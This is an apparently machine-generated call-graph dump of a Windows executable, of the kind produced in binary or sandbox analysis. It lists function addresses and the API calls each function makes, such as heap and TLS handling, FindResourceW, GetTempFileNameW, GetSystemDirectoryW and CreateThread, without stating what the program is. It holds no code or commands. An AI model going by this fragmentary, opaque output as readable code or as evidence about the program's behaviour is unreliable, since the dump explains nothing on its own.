401df2 8154 40de80 GetLastError TlsGetValue SetLastError 7559->8154 7561 401dfa 7562 409872 21 API calls 7561->7562 7563 401e06 7562->7563 7564 40dec0 3 API calls 7563->7564 7564->7537 7566 403df9 7565->7566 7566->7566 7567 40dfc0 21 API calls 7566->7567 7583 403e0b 7567->7583 7568 405dc0 3 API calls 7568->7583 7569 40de80 GetLastError TlsGetValue SetLastError 7590 403e8c 7569->7590 7570 40de80 GetLastError TlsGetValue SetLastError 7596 403f0d 7570->7596 7571 405dc0 3 API calls 7571->7590 7572 40de80 GetLastError TlsGetValue SetLastError 7572->7583 7573 405dc0 3 API calls 7573->7596 7574 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7574->7583 7575 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7575->7596 7576 405dc0 3 API calls 7601 403f8e 7576->7601 7577 40de80 GetLastError TlsGetValue SetLastError 7606 40400f 7577->7606 7578 40de80 GetLastError TlsGetValue SetLastError 7611 404090 7578->7611 7579 40de80 GetLastError TlsGetValue SetLastError 7620 404115 7579->7620 7580 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7580->7590 7581 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7581->7601 7582 405dc0 3 API calls 7582->7606 7583->7568 7583->7572 7583->7574 7588 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7583->7588 7583->7590 7584 40de80 GetLastError TlsGetValue SetLastError 7584->7601 7585 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7585->7606 7586 405dc0 3 API calls 7586->7611 7587 40de80 GetLastError TlsGetValue SetLastError 7612 40419a 7587->7612 7588->7583 7589 4042a4 8189 40de80 GetLastError TlsGetValue SetLastError 7589->8189 7590->7569 7590->7571 7590->7580 7591 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7590->7591 7590->7596 7591->7590 7592 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7592->7596 7593 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7593->7601 7596->7570 7596->7573 7596->7575 7596->7592 7596->7601 7597 4042b0 7600 40e020 4 API calls 7597->7600 7598 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7598->7620 7599 405dc0 3 API calls 7599->7612 7602 4042b8 7600->7602 7601->7576 7601->7581 7601->7584 7601->7593 7601->7606 7605 40e020 4 API calls 7602->7605 7603 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7603->7606 7604 405dc0 3 API calls 7607 40421f 7604->7607 7608 4042c2 7605->7608 7606->7577 7606->7582 7606->7585 7606->7603 7606->7611 7607->7589 7607->7604 7618 40de80 GetLastError TlsGetValue SetLastError 7607->7618 7624 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7607->7624 7627 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7607->7627 7610 40dec0 3 API calls 7608->7610 7609 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7609->7611 7613 4042ce 7610->7613 7611->7578 7611->7586 7611->7609 7615 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7611->7615 7611->7620 7612->7587 7612->7599 7612->7607 7617 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7612->7617 7623 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 7612->7623 8190 40de80 GetLastError TlsGetValue SetLastError 7613->8190 7615->7611 7616 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 7616->7620 7617->7612 7618->7607 7619 4042d4 8191 403275 7619->8191 7620->7579 7620->7598 7620->7612 7620->7616 8186 405dc0 7620->8186 7623->7612 7624->7607 7625 40dec0 3 API calls 7626 4042ed 7625->7626 7628 40985e 17 API calls 7626->7628 7627->7607 7629 4042f2 GetModuleHandleW 7628->7629 8284 40de80 GetLastError TlsGetValue SetLastError 7629->8284 7631 40430b 8285 40de80 GetLastError TlsGetValue SetLastError 7631->8285 7633 404313 8286 40de80 GetLastError TlsGetValue SetLastError 7633->8286 7635 40431b 8287 40de80 GetLastError TlsGetValue SetLastError 7635->8287 7637 404323 7638 40d100 8 API calls 7637->7638 7639 404335 7638->7639 8288 405182 TlsGetValue 7639->8288 7641 40433a 7642 405eb0 6 API calls 7641->7642 7643 404342 7642->7643 7644 40dec0 3 API calls 7643->7644 7645 40434c 7644->7645 8289 40de80 GetLastError TlsGetValue SetLastError 7645->8289 7647 404352 8290 40de80 GetLastError TlsGetValue SetLastError 7647->8290 7649 40435a 8291 40de80 GetLastError TlsGetValue SetLastError 7649->8291 7651 404362 8292 40de80 GetLastError TlsGetValue SetLastError 7651->8292 7653 40436a 7654 40d100 8 API calls 7653->7654 7655 40437a 7654->7655 8293 405182 TlsGetValue 7655->8293 7657 40437f 7658 405eb0 6 API calls 7657->7658 7659 404387 7658->7659 7660 40dec0 3 API calls 7659->7660 7661 404391 7660->7661 8294 402e9d 7661->8294 7665 4043a4 8311 4021a4 7665->8311 7668 4051a0 3 API calls 7669 4043b4 7668->7669 8427 40195b 7669->8427 7675 4043c8 8518 40358d 7675->8518 7678 40dec0 3 API calls 7679 4043ee PathRemoveBackslashW 7678->7679 7680 404402 7679->7680 8646 40de80 GetLastError TlsGetValue SetLastError 7680->8646 7682 404408 8647 40de80 GetLastError TlsGetValue SetLastError 7682->8647 7684 404410 8648 402bfa 7684->8648 7688 404422 8678 405182 TlsGetValue 7688->8678 7690 40442b 8679 4098c0 7690->8679 7693 4051a0 3 API calls 7694 404439 7693->7694 8683 40de80 GetLastError TlsGetValue SetLastError 7694->8683 7696 404445 7697 40e020 4 API calls 7696->7697 7698 40444d 7697->7698 7699 40e020 4 API calls 7698->7699 7700 404459 7699->7700 7701 40dec0 3 API calls 7700->7701 7702 404465 7701->7702 8684 40de80 GetLastError TlsGetValue SetLastError 7702->8684 7704 40446b 8685 401e55 7704->8685 7707 40dec0 3 API calls 7708 404480 7707->7708 8731 403855 7708->8731 7712 404491 7713 40e020 4 API calls 7712->7713 7714 404499 7713->7714 7715 40dec0 3 API calls 7714->7715 7716 4044a3 PathQuoteSpacesW 7715->7716 8925 40de80 GetLastError TlsGetValue SetLastError 7716->8925 7718 4044b6 7719 40e020 4 API calls 7718->7719 7720 4044be 7719->7720 7721 40e020 4 API calls 7720->7721 7722 4044c9 7721->7722 7723 40e020 4 API calls 7722->7723 7724 4044d3 7723->7724 7725 40dec0 3 API calls 7724->7725 7726 4044dd PathQuoteSpacesW 7725->7726 7727 4044f1 7726->7727 7728 404509 7726->7728 8978 405492 CreateThread 7727->8978 8988 402ca9 7728->8988 7731 404512 8926 40de80 GetLastError TlsGetValue SetLastError 7731->8926 7734 404518 7793 40dfc0 21 API calls 7792->7793 7794 40300e 7793->7794 10167 40de80 GetLastError TlsGetValue SetLastError 7794->10167 7796 403014 10168 40de80 GetLastError TlsGetValue SetLastError 7796->10168 7798 40301c 10169 40de80 GetLastError TlsGetValue SetLastError 7798->10169 7800 403024 10170 40de80 GetLastError TlsGetValue SetLastError 7800->10170 7802 40302c 7803 40d100 8 API calls 7802->7803 7804 40303e 7803->7804 10171 405182 TlsGetValue 7804->10171 7806 403043 7807 405eb0 6 API calls 7806->7807 7808 40304b 7807->7808 7809 40dec0 3 API calls 7808->7809 7810 403055 7809->7810 10172 40de80 GetLastError TlsGetValue SetLastError 7810->10172 7812 40305b 10173 40de80 GetLastError TlsGetValue SetLastError 7812->10173 7814 403063 10174 40de80 GetLastError TlsGetValue SetLastError 7814->10174 7816 40306b 10175 40de80 GetLastError TlsGetValue SetLastError 7816->10175 7818 403073 7819 40d100 8 API calls 7818->7819 7820 403083 7819->7820 10176 405182 TlsGetValue 7820->10176 7822 403088 7823 405eb0 6 API calls 7822->7823 7824 403090 7823->7824 7825 40dec0 3 API calls 7824->7825 7826 40309a 7825->7826 7827 402e9d 35 API calls 7826->7827 7828 4030a2 7827->7828 10177 40de80 GetLastError TlsGetValue SetLastError 7828->10177 7830 4030ac 7831 4021a4 122 API calls 7830->7831 7832 4030b7 7831->7832 7833 4051a0 3 API calls 7832->7833 7834 4030bc 7833->7834 10178 40de80 GetLastError TlsGetValue SetLastError 7834->10178 7836 4030c2 10179 40de80 GetLastError TlsGetValue SetLastError 7836->10179 7838 4030ca 7839 409355 33 API calls 7838->7839 7840 4030dd 7839->7840 7841 40dec0 3 API calls 7840->7841 7842 4030e7 7841->7842 7843 40323e 7842->7843 10180 40de80 GetLastError TlsGetValue SetLastError 7842->10180 7843->7843 7845 4030fe 10181 40de80 GetLastError TlsGetValue SetLastError 7845->10181 7847 403106 10182 40de80 GetLastError TlsGetValue SetLastError 7847->10182 7849 40310e 10183 40de80 GetLastError TlsGetValue SetLastError 7849->10183 7851 403116 7852 40d100 8 API calls 7851->7852 7853 403128 7852->7853 10184 405182 TlsGetValue 7853->10184 7855 40312d 7856 405eb0 6 API calls 7855->7856 7857 403135 7856->7857 7858 40dec0 3 API calls 7857->7858 7859 40313f 7858->7859 10185 40de80 GetLastError TlsGetValue SetLastError 7859->10185 7861 403145 10186 40de80 GetLastError TlsGetValue SetLastError 7861->10186 7863 40314d 10187 40de80 GetLastError TlsGetValue SetLastError 7863->10187 7865 403155 10188 40de80 GetLastError TlsGetValue SetLastError 7865->10188 7867 40315d 7868 40d100 8 API calls 7867->7868 7869 40316f 7868->7869 10189 405182 TlsGetValue 7869->10189 7871 403174 7872 405eb0 6 API calls 7871->7872 7873 40317c 7872->7873 7874 40dec0 3 API calls 7873->7874 7875 403186 7874->7875 10190 40de80 GetLastError TlsGetValue SetLastError 7875->10190 7877 40318c 7878 403cd7 84 API calls 7877->7878 7879 40319c 7878->7879 7880 40dec0 3 API calls 7879->7880 7881 4031a8 7880->7881 10191 40de80 GetLastError TlsGetValue SetLastError 7881->10191 7883 4031ae 7884 403cd7 84 API calls 7883->7884 7885 4031be 7884->7885 7886 40dec0 3 API calls 7885->7886 7887 4031c8 PathAddBackslashW 7886->7887 10192 40de80 GetLastError TlsGetValue SetLastError 7887->10192 7889 4031d7 10193 40de80 GetLastError TlsGetValue SetLastError 7889->10193 7891 4031e7 7892 40e020 4 API calls 7891->7892 7893 4031ef 7892->7893 7894 40e020 4 API calls 7893->7894 7895 4031fb 7894->7895 10194 405182 TlsGetValue 7895->10194 7897 403200 7898 40240c 34 API calls 7897->7898 7899 403208 7898->7899 7900 4051a0 3 API calls 7899->7900 7901 40320d 7900->7901 10195 40de80 GetLastError TlsGetValue SetLastError 7901->10195 7903 403217 7904 40e020 4 API calls 7903->7904 7905 40321f 7904->7905 7906 40dec0 3 API calls 7905->7906 7907 40322b PathRemoveBackslashW 7906->7907 7908 402ca9 141 API calls 7907->7908 7908->7843 7909->7377 7910->7380 7912 40d362 7911->7912 7913 40d3a0 TlsGetValue HeapReAlloc TlsSetValue 7912->7913 7914 40d378 TlsAlloc HeapAlloc TlsSetValue 7912->7914 7915 40d3e0 7913->7915 7916 40d3dc 7913->7916 7914->7913 7921 40db72 HeapAlloc 7915->7921 7916->7915 7917 409674 7916->7917 7920 40d52c HeapAlloc HeapAlloc InitializeCriticalSection 7917->7920 7920->7386 7922 40d3ec 7921->7922 7922->7917 7924 40e141 wcslen 7923->7924 7925 40e1ad 7923->7925 7927 40e176 HeapReAlloc 7924->7927 7928 40e158 HeapAlloc 7924->7928 7926 40e1b5 HeapFree 7925->7926 7929 40e198 7925->7929 7926->7929 7927->7929 7928->7929 7929->7391 7931 409def HeapAlloc 7930->7931 7932 409ed8 7930->7932 7931->7395 7931->7396 7956 40a11a 7932->7956 7934 409ee0 7963 40d946 7934->7963 7937 409f23 HeapFree 7937->7931 7938 409f0f 7939 409f10 HeapFree 7938->7939 7939->7939 7940 409f22 7939->7940 7940->7937 7942 40d83a 7941->7942 7943 40d8f2 RtlAllocateHeap 7942->7943 7944 40d846 7942->7944 7946 40d907 7943->7946 7947 409e76 HeapAlloc 7943->7947 8000 40da43 LoadLibraryW 7944->8000 7946->7947 7949 40d930 InitializeCriticalSection 7946->7949 7947->7400 7949->7947 7950 40d887 HeapAlloc 7952 40d8e5 LeaveCriticalSection 7950->7952 7953 40d89d 7950->7953 7951 40d86b 7951->7950 7951->7952 7952->7947 7954 40d819 6 API calls 7953->7954 7955 40d8b4 7954->7955 7955->7952 7960 40a12e 7956->7960 7957 40a177 memset 7959 40a190 7957->7959 7958 40a139 HeapFree 7958->7960 7959->7934 7960->7957 7960->7958 7976 411d8a 7960->7976 7981 40d74b 7960->7981 7964 40d953 EnterCriticalSection 7963->7964 7965 40d9b8 7963->7965 7966 40d9ae LeaveCriticalSection 7964->7966 7967 40d96f 7964->7967 7991 40d6dd 7965->7991 7970 409ee8 HeapFree HeapFree 7966->7970 7969 40d946 4 API calls 7967->7969 7974 40d979 HeapFree 7969->7974 7970->7937 7970->7938 7972 40d9c4 DeleteCriticalSection 7973 40d9ce HeapFree 7972->7973 7973->7970 7974->7966 7977 411e85 7976->7977 7978 411da2 7976->7978 7977->7960 7978->7977 7980 411d8a HeapFree 7978->7980 7988 40df50 7978->7988 7980->7978 7982 40d758 EnterCriticalSection 7981->7982 7985 40d762 7981->7985 7982->7985 7983 40d814 7983->7960 7984 40d80a LeaveCriticalSection 7984->7983 7986 40d7cb 7985->7986 7987 40d7b5 HeapFree 7985->7987 7986->7983 7986->7984 7987->7986 7989 40df5b HeapFree 7988->7989 7990 40df6e 7988->7990 7989->7990 7990->7978 7992 40d6f5 7991->7992 7993 40d6eb EnterCriticalSection 7991->7993 7994 40d712 7992->7994 7995 40d6fc HeapFree 7992->7995 7993->7992 7996 40d718 HeapFree 7994->7996 7997 40d72e 7994->7997 7995->7994 7995->7995 7996->7996 7996->7997 7998 40d745 7997->7998 7999 40d73b LeaveCriticalSection 7997->7999 7998->7972 7998->7973 7999->7998 8001 40da60 GetProcAddress 8000->8001 8002 40da8b InterlockedCompareExchange 8000->8002 8005 40da80 FreeLibrary 8001->8005 8006 40da70 8001->8006 8003 40da9b 8002->8003 8004 40daaf InterlockedExchange 8002->8004 8007 40d855 EnterCriticalSection 8003->8007 8009 40daa0 Sleep 8003->8009 8004->8007 8005->8002 8005->8007 8006->8005 8007->7951 8009->8003 8011 40a4c6 8010->8011 8015 40a4a7 8010->8015 8012 40a3eb 8011->8012 8013 40d74b 3 API calls 8011->8013 8012->7409 8013->8011 8014 411d8a HeapFree 8014->8015 8015->8012 8015->8014 8016 40d74b 3 API calls 8015->8016 8016->8015 8018 40dbdb 8017->8018 8020 40dd26 8017->8020 8018->7423 8018->7425 8019 40dd51 HeapFree 8019->8018 8020->8019 8021 40dd4f 8020->8021 8022 411d8a HeapFree 8020->8022 8021->8019 8022->8020 8024 40dfea TlsGetValue 8023->8024 8025 40dfcc 8023->8025 8027 402f4d 8024->8027 8028 40dffb 8024->8028 8026 40de30 5 API calls 8025->8026 8029 40dfd1 TlsGetValue 8026->8029 8035 4051a0 8027->8035 8067 40e6a0 HeapAlloc HeapAlloc TlsSetValue 8028->8067 8058 412082 8029->8058 8032 40e000 TlsGetValue 8034 412082 13 API calls 8032->8034 8034->8027 8068 40e780 GetLastError TlsGetValue SetLastError 8035->8068 8037 4051ab 8037->7437 8038->7439 8039->7441 8040->7443 8041->7445 8044 40d12d 8042->8044 8069 40d220 8044->8069 8046 405182 TlsGetValue 8046->7449 8048 405ebd 8047->8048 8079 40e1e0 TlsGetValue 8048->8079 8051 40e260 3 API calls 8052 405ed1 8051->8052 8053 405edd 8052->8053 8081 40e370 TlsGetValue 8052->8081 8055 405f0d 8053->8055 8056 405f00 CharUpperW 8053->8056 8055->7451 8056->7451 8057->7453 8059 412092 TlsAlloc InitializeCriticalSection 8058->8059 8060 4120ae TlsGetValue 8058->8060 8059->8060 8061 4120c4 HeapAlloc 8060->8061 8062 41214b HeapAlloc 8060->8062 8063 40dfe8 8061->8063 8064 4120de EnterCriticalSection 8061->8064 8062->8063 8063->8027 8065 4120f0 7 API calls 8064->8065 8066 4120ee 8064->8066 8065->8062 8066->8065 8067->8032 8068->8037 8070 40d22c 8069->8070 8073 40e260 TlsGetValue 8070->8073 8074 40e27b 8073->8074 8075 40e2a1 HeapReAlloc 8074->8075 8076 40e2d4 8074->8076 8077 402fd9 8075->8077 8076->8077 8078 40e2f0 HeapReAlloc 8076->8078 8077->8046 8078->8077 8080 405ec5 8079->8080 8080->8051 8081->8053 8082->7462 8083->7464 8084->7466 8086 40e260 3 API calls 8085->8086 8087 4096aa GetModuleFileNameW wcscmp 8086->8087 8088 4096e5 8087->8088 8089 4096cd memmove 8087->8089 8155 40e3f0 TlsGetValue 8088->8155 8089->8088 8091 401bc5 8092 405182 TlsGetValue 8091->8092 8092->7470 8093->7480 8094->7482 8095->7484 8096->7486 8097->7488 8098->7491 8100 405e1d 8099->8100 8101 40e1e0 TlsGetValue 8100->8101 8102 405e40 8101->8102 8103 40e260 3 API calls 8102->8103 8104 405e4c 8103->8104 8105 401ce9 8104->8105 8156 40e370 TlsGetValue 8104->8156 8107 405182 TlsGetValue 8105->8107 8107->7496 8157 40d080 8108->8157 8111 405182 TlsGetValue 8111->7500 8112->7506 8114 40e042 8113->8114 8115 40e033 wcslen 8113->8115 8116 40e260 3 API calls 8114->8116 8115->8114 8117 40e04d 8116->8117 8117->7508 8118->7512 8119->7514 8120->7516 8121->7518 8122->7522 8123->7528 8124->7530 8126 405f2e 8125->8126 8127 40e1e0 TlsGetValue 8126->8127 8128 405f4a 8127->8128 8129 40e260 3 API calls 8128->8129 8130 405f56 8129->8130 8132 405f62 8130->8132 8173 40e370 TlsGetValue 8130->8173 8132->7532 8174 40d2e8 TlsGetValue 8133->8174 8138 40de80 GetLastError TlsGetValue SetLastError 8138->7539 8139->7543 8141 40d2e8 16 API calls 8140->8141 8142 409885 8141->8142 8143 40973a 17 API calls 8142->8143 8144 409898 8143->8144 8145 40e260 3 API calls 8144->8145 8146 4098a6 8145->8146 8184 40e3f0 TlsGetValue 8146->8184 8148 401dc9 8149 40e080 TlsGetValue 8148->8149 8149->7551 8185 40e740 TlsGetValue 8150->8185 8152 40516a 8152->7557 8153->7559 8154->7561 8155->8091 8156->8105 8160 40d092 8157->8160 8158 40d0dd 8159 40d220 3 API calls 8158->8159 8161 401cf6 8159->8161 8160->8158 8162 40d0b2 8160->8162 8161->8111 8166 4121a0 8162->8166 8164 40d0b8 8172 412190 free 8164->8172 8167 412214 malloc 8166->8167 8168 4121ac WideCharToMultiByte 8166->8168 8167->8164 8168->8167 8170 4121e0 malloc 8168->8170 8170->8167 8171 4121f2 WideCharToMultiByte 8170->8171 8171->8164 8172->8158 8173->8132 8175 409869 8174->8175 8176 40d2fb HeapAlloc TlsSetValue 8174->8176 8180 40973a 8175->8180 8177 40d327 8176->8177 8178 412082 13 API calls 8177->8178 8179 40d348 8178->8179 8179->8175 8181 40d2e8 16 API calls 8180->8181 8182 40974b GetCommandLineW 8181->8182 8183 401dab 8182->8183 8183->7537 8183->8138 8184->8148 8185->8152 8187 40e260 3 API calls 8186->8187 8188 405dcb 8187->8188 8188->7620 8189->7597 8190->7619 8192 40327b 8191->8192 8192->8192 8193 40dfc0 21 API calls 8192->8193 8194 40328d 8193->8194 8195 4051a0 3 API calls 8194->8195 8196 403296 8195->8196 9053 405060 8196->9053 8199 405060 2 API calls 8200 4032af 8199->8200 9056 402bc1 8200->9056 8203 4032b8 9063 40559a GetVersionExW 8203->9063 8204 4032cb 8207 4032d5 8204->8207 8208 40343b 8204->8208 9069 40de80 GetLastError TlsGetValue SetLastError 8207->9069 9101 40de80 GetLastError TlsGetValue SetLastError 8208->9101 8211 403441 9102 40de80 GetLastError TlsGetValue SetLastError 8211->9102 8212 4032db 9070 40de80 GetLastError TlsGetValue SetLastError 8212->9070 8215 403449 8217 4062c0 3 API calls 8215->8217 8216 4032e3 9071 4062c0 8216->9071 8219 403455 8217->8219 8221 40dec0 3 API calls 8219->8221 8223 40345f GetSystemDirectoryW PathAddBackslashW 8221->8223 8222 40dec0 3 API calls 8224 4032f9 GetWindowsDirectoryW PathAddBackslashW 8222->8224 8226 403439 8223->8226 9074 40de80 GetLastError TlsGetValue SetLastError 8224->9074 9061 40de80 GetLastError TlsGetValue SetLastError 8226->9061 8227 40331a 8229 40e020 4 API calls 8227->8229 8231 403322 8229->8231 8230 403480 8232 40e020 4 API calls 8230->8232 8233 40e020 4 API calls 8231->8233 8234 403488 8232->8234 8236 40332d 8233->8236 9062 405170 TlsGetValue 8234->9062 8238 40dec0 3 API calls 8236->8238 8237 40348f 8240 40df50 HeapFree 8237->8240 8239 403337 PathAddBackslashW 8238->8239 9075 40de80 GetLastError TlsGetValue SetLastError 8239->9075 8242 4034a7 8240->8242 8244 40df50 HeapFree 8242->8244 8243 40334a 8245 40e020 4 API calls 8243->8245 8246 4034af 8244->8246 8247 403352 8245->8247 8248 40df50 HeapFree 8246->8248 8249 40e020 4 API calls 8247->8249 8250 4034b8 8248->8250 8251 40335c 8249->8251 8252 40df50 HeapFree 8250->8252 8253 40dec0 3 API calls 8251->8253 8254 4034c1 8252->8254 8255 403366 8253->8255 8257 40df50 HeapFree 8254->8257 9076 40de80 GetLastError TlsGetValue SetLastError 8255->9076 8259 4034ca 8257->8259 8258 403370 8260 40e020 4 API calls 8258->8260 8259->7625 8261 403378 8260->8261 8262 40e020 4 API calls 8261->8262 8263 403382 8262->8263 8264 40e020 4 API calls 8263->8264 8265 40338c 8264->8265 8266 40dec0 3 API calls 8265->8266 8267 403396 8266->8267 9077 40adc0 8267->9077 8269 4033a4 8270 4033ba 8269->8270 9087 40a9d0 8269->9087 8272 40adc0 11 API calls 8270->8272 8273 4033d2 8272->8273 8274 4033e8 8273->8274 8275 40a9d0 11 API calls 8273->8275 8274->8226 9099 40de80 GetLastError TlsGetValue SetLastError 8274->9099 8275->8274 8277 403404 9100 40de80 GetLastError TlsGetValue SetLastError 8277->9100 8279 40340c 8280 4062c0 3 API calls 8279->8280 8281 403418 8280->8281 8282 40dec0 3 API calls 8281->8282 8283 403422 GetSystemDirectoryW PathAddBackslashW 8282->8283 8283->8226 8284->7631 8285->7633 8286->7635 8287->7637 8288->7641 8289->7647 8290->7649 8291->7651 8292->7653 8293->7657 8295 40dfc0 21 API calls 8294->8295 8296 402eaa 8295->8296 8297 405060 2 API calls 8296->8297 8298 402eb6 FindResourceW 8297->8298 8299 402ed5 8298->8299 8306 402ef1 8298->8306 9157 4026b8 8299->9157 8303 402f00 9154 40e7c0 8303->9154 9151 409ba0 8306->9151 8308 40df50 HeapFree 8309 402f3b 8308->8309 8310 40de80 GetLastError TlsGetValue SetLastError 8309->8310 8310->7665 8312 40dfc0 21 API calls 8311->8312 8313 4021b0 8312->8313 8314 4051a0 3 API calls 8313->8314 8315 4021b9 8314->8315 8316 4021d2 8315->8316 8317 4023ba 8315->8317 9193 40de80 GetLastError TlsGetValue SetLastError 8316->9193 9191 40de80 GetLastError TlsGetValue SetLastError 8317->9191 8320 4021d8 9194 40de80 GetLastError TlsGetValue SetLastError 8320->9194 8321 4023c4 8323 40e020 4 API calls 8321->8323 8325 4023cc 8323->8325 8324 4021e0 9195 40de80 GetLastError TlsGetValue SetLastError 8324->9195 9192 405170 TlsGetValue 8325->9192 8328 4021e8 9196 40de80 GetLastError TlsGetValue SetLastError 8328->9196 8329 4023d3 8331 40df50 HeapFree 8329->8331 8333 4023eb 8331->8333 8332 4021f0 9197 409c10 8332->9197 8335 40df50 HeapFree 8333->8335 8337 4023f4 8335->8337 8336 402204 9206 405182 TlsGetValue 8336->9206 8339 40df50 HeapFree 8337->8339 8342 4023fc 8339->8342 8340 402209 9207 406060 8340->9207 8344 40df50 HeapFree 8342->8344 8346 402405 8344->8346 8345 40dec0 3 API calls 8347 40221b 8345->8347 8346->7668 9210 40de80 GetLastError TlsGetValue SetLastError 8347->9210 8349 402221 9211 40de80 GetLastError TlsGetValue SetLastError 8349->9211 8351 402229 9212 40de80 GetLastError TlsGetValue SetLastError 8351->9212 8353 402231 9213 40de80 GetLastError TlsGetValue SetLastError 8353->9213 8355 402239 8356 409c10 5 API calls 8355->8356 8357 402250 8356->8357 9214 405182 TlsGetValue 8357->9214 8359 402255 8360 406060 5 API calls 8359->8360 8361 40225d 8360->8361 8362 40dec0 3 API calls 8361->8362 8363 402267 8362->8363 9215 40de80 GetLastError TlsGetValue SetLastError 8363->9215 8365 40226d 9216 40de80 GetLastError TlsGetValue SetLastError 8365->9216 8367 402275 9217 40de80 GetLastError TlsGetValue SetLastError 8367->9217 8369 402288 9218 40de80 GetLastError TlsGetValue SetLastError 8369->9218 8371 402290 9219 4057f0 8371->9219 8373 4022a6 9235 40e080 TlsGetValue 8373->9235 8375 4022ab 9236 40de80 GetLastError TlsGetValue SetLastError 8375->9236 8377 4022b1 9237 40de80 GetLastError TlsGetValue SetLastError 8377->9237 8379 4022b9 8380 4057f0 9 API calls 8379->8380 8381 4022cf 8380->8381 9238 405182 TlsGetValue 8381->9238 8383 4022d4 9239 405182 TlsGetValue 8383->9239 8385 4022dc 9240 408f69 8385->9240 8388 40dec0 3 API calls 8389 4022ef 8388->8389 8390 4023b0 8389->8390 8391 402300 8389->8391 8393 401fa9 36 API calls 8390->8393 9282 40de80 GetLastError TlsGetValue SetLastError 8391->9282 8393->8317 8394 402306 9283 40de80 GetLastError TlsGetValue SetLastError 8394->9283 8396 40230e 9284 40de80 GetLastError TlsGetValue SetLastError 8396->9284 8398 40231b 9285 40de80 GetLastError TlsGetValue SetLastError 8398->9285 8400 402323 8401 406060 5 API calls 8400->8401 8402 40232e 8401->8402 9286 405182 TlsGetValue 8402->9286 8404 402333 8405 40d100 8 API calls 8404->8405 8406 40233b 8405->8406 8407 40dec0 3 API calls 8406->8407 8408 402345 8407->8408 8409 4023ae 8408->8409 9287 40de80 GetLastError TlsGetValue SetLastError 8408->9287 8409->8317 8411 40235b 9288 40de80 GetLastError TlsGetValue SetLastError 8411->9288 8413 402368 9289 40de80 GetLastError TlsGetValue SetLastError 8413->9289 8415 402370 8416 4057f0 9 API calls 8415->8416 8417 402386 8416->8417 9290 40e080 TlsGetValue 8417->9290 8419 40238b 9291 405182 TlsGetValue 8419->9291 8421 402396 9292 408e27 8421->9292 8424 4051a0 3 API calls 8425 4023a4 8424->8425 8426 401fa9 36 API calls 8425->8426 8426->8409 8428 40dfc0 21 API calls 8427->8428 8432 401969 8428->8432 8429 4019ea 8431 409ba0 RtlAllocateHeap 8429->8431 8430 40de80 GetLastError TlsGetValue SetLastError 8430->8432 8433 4019f4 8431->8433 8432->8429 8432->8430 8436 405dc0 3 API calls 8432->8436 8443 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8432->8443 8448 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8432->8448 9349 40de80 GetLastError TlsGetValue SetLastError 8433->9349 8435 4019fe 9350 40de80 GetLastError TlsGetValue SetLastError 8435->9350 8436->8432 8438 401a06 9351 40a756 8438->9351 8441 40dec0 3 API calls 8442 401a17 GetTempFileNameW 8441->8442 9360 40de80 GetLastError TlsGetValue SetLastError 8442->9360 8443->8432 8445 401a35 9361 40de80 GetLastError TlsGetValue SetLastError 8445->9361 8447 401a3d 8449 409bc0 4 API calls 8447->8449 8448->8432 8450 401a48 8449->8450 8451 40dec0 3 API calls 8450->8451 8452 401a54 8451->8452 9362 40a7e7 8452->9362 8458 401a8a 9371 40de80 GetLastError TlsGetValue SetLastError 8458->9371 8460 401a92 8461 409bc0 4 API calls 8460->8461 8462 401a9d 8461->8462 8463 40dec0 3 API calls 8462->8463 8464 401aa9 8463->8464 8465 40a7e7 2 API calls 8464->8465 8466 401ab4 8465->8466 8467 40a6c5 3 API calls 8466->8467 8468 401abf GetTempFileNameW PathAddBackslashW 8467->8468 9372 40de80 GetLastError TlsGetValue SetLastError 8468->9372 8470 401aea 9373 40de80 GetLastError TlsGetValue SetLastError 8470->9373 8472 401af2 8473 409bc0 4 API calls 8472->8473 8474 401afd 8473->8474 8475 40dec0 3 API calls 8474->8475 8476 401b09 8475->8476 8477 40a7e7 2 API calls 8476->8477 8478 401b14 PathRenameExtensionW GetTempFileNameW 8477->8478 9374 40de80 GetLastError TlsGetValue SetLastError 8478->9374 8480 401b43 9375 40de80 GetLastError TlsGetValue SetLastError 8480->9375 8482 401b4b 8483 409bc0 4 API calls 8482->8483 8484 401b56 8483->8484 8485 40dec0 3 API calls 8484->8485 8486 401b62 8485->8486 9376 409b80 HeapFree 8486->9376 8488 401b6b 8489 40df50 HeapFree 8488->8489 8490 401b78 8489->8490 8491 40df50 HeapFree 8490->8491 8492 401b81 8491->8492 8493 40df50 HeapFree 8492->8493 8494 401b8a 8493->8494 8495 40460e 8494->8495 8496 40dfc0 21 API calls 8495->8496 8500 40461b 8496->8500 8497 40469c 9383 40de80 GetLastError TlsGetValue SetLastError 8497->9383 8498 40de80 GetLastError TlsGetValue SetLastError 8498->8500 8500->8497 8500->8498 8502 405dc0 3 API calls 8500->8502 8511 40e020 wcslen TlsGetValue HeapReAlloc HeapReAlloc 8500->8511 8514 40dec0 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 8500->8514 8501 4046a2 8503 40358d 98 API calls 8501->8503 8502->8500 8504 4046b8 8503->8504 8505 40dec0 3 API calls 8504->8505 8506 4046c2 8505->8506 9384 40a95a 8506->9384 8509 40df50 HeapFree 8510 4046d6 8509->8510 8512 40df50 HeapFree 8510->8512 8511->8500 8513 4046df 8512->8513 8515 40df50 HeapFree 8513->8515 8514->8500 8516 4043c2 8515->8516 8517 40de80 GetLastError TlsGetValue SetLastError 8516->8517 8517->7675 8519 40dfc0 21 API calls 8518->8519 8520 403597 8519->8520 8521 4051a0 3 API calls 8520->8521 